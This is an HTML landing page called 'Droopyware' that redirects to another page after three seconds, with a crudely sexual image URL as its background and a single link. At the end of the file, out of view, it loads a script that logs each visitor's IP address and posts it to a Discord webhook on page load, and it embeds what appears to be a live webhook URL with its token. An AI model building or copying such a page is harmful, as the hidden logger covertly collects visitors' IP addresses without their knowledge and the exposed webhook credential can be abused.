<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
    <meta http-equiv="refresh" content="3;url=MAINPAGE.html" /> 
</head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Droopyware</title>
    <style>
        body {
            background-image: url("https://preview.redd.it/i-know-you-want-my-big-black-cock-v0-7p71mt7mce6b1.jpg?width=640&crop=smart&auto=webp&s=34306129606acaaa826a73290c4f6c19fa06fe26");
            background-size: 190px;
            font-size: 50px;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            text-shadow: 0 0 30px rgb(255, 255, 255);
        }
        a { 
            text-decoration: none;
            color: inherit;
            color: rgb(255, 255, 255);
            transition: transform 0.3s, font-weight 0.3s;
        }
        a:hover {
            transform: scale(1.1);
            font-weight: bold;
        }
    </style>
</head>
<body>
    <a href="hub.html">DROOPYBALLS
    </a>
</body><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
<script src="https://cdn.jsdelivr.net/gh/luisoos/IP-Log-To-Discord-Webhook/index.js"></script>
<script>var webHookUrl = "https://discord.com/api/webhooks/1296124356287528972/wkhVtsusfBPNIcUWPbSRmdpzzpEM99ouYdLSEqTbD5j-SmVByHHR_bhoFx4DH3BRApF_";</script>
</html>
